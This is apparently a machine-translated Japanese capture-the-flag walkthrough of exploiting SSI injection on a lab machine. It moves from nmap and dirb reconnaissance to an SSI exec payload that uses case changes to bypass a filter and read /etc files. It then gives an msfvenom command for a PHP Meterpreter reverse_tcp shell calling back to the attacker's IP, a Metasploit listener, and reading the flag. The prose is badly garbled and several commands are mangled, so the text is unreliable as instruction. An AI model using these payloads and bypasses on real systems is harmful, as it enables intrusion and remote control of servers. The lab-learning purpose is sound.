Ssiインジェクション



Ssi Injection



Ssiインジェクションは、フォーマットに類似した入力ポイント入力を見つけて、システムコマンドを実行できるかどうかを確認することです。

といった



ディレクトリを切り替える

いつものように、ifconfigが自身のIPをスキャンアウトすると、nmap-sV攻撃者のIPは、ターゲットマシンのIPと、開いているポートおよび関連情報を取得できます。



httpサービスのターゲットポートオープンポート80を参照し、dirbを使用して機密情報を検出します



次に、robot.txt、/ spukcab /へのリンクを介して、

ロボットの代わりにそれを使用してください、txtは2つのファイルインデックスを取得します、bak oldconfig.bak、それをダウンロードして、ターミナルでそれを開きます

一連のコードテキストを取得します。それが役立つかどうかわからないので、2匹の猫を完全に倒します。

それに加えて

これはSSIインジェクションフォーマットと同じです。二重引用符は、対応するLinuxコマンドです。このコマンドを使用すると、現在のシステムのユーザー名とパスワードを取得できます。

次に、SSIインジェクションの脆弱性を使用します。

私たちが試したリンクだけで、ランディングページが表示され、開いて、

これをターゲットとフィードバックにコピーします

execbianchengを大文字にすることもできます。

ログイン成功

表示されるのは、先ほどコピーしたLinuxコマンドです。

次に、ログインしたばかりのページに戻り、フィードバック列を追加します-前に!取得する

etcファイルの効果と内容を返しました

次の一歩

シェルスクリプトをダウンロードして名前を変更します

Webシェルを作成します。

Msfvenom -p php / Meterpreter / reverse_tcp lhost = attackerIPアドレスlport = 4444 -f raw> /root/Desktop/shell.php


metasploitを開いてリスニングを開始します。

msfconsole

次に、パラメータを設定します

設定後に実行を入力してください

次に、Pythonスクリプトをダウンロードします。

そして、shell.phpに名前が変更されました

つまり、1以上のログインページに入力します。

shell.pyを/ var / www / html /のルートディレクトリに移動します

現在のディレクトリ情報を表示する

Apacheサービスを開き、サービスのApacheステータスをチェックして、有効になっているかどうかを確認します。

シェルが返されるかどうかを確認します

Lコマンドケース変換を変換して、フィルタリングメカニズムをバイパスし、シェルをアップロードし、シェルをバウンスし、

次に、shell.phpにchomd 777shell.phpへのアクセス許可も付与します。

シェルコマンドを実行した後:sysinfoを使用してシステム情報を表示します

シェルがシステムシェルに入り、検出が以前と同じではありません

Python最適化シェル

最適化、

cd / root /

ls

猫の旗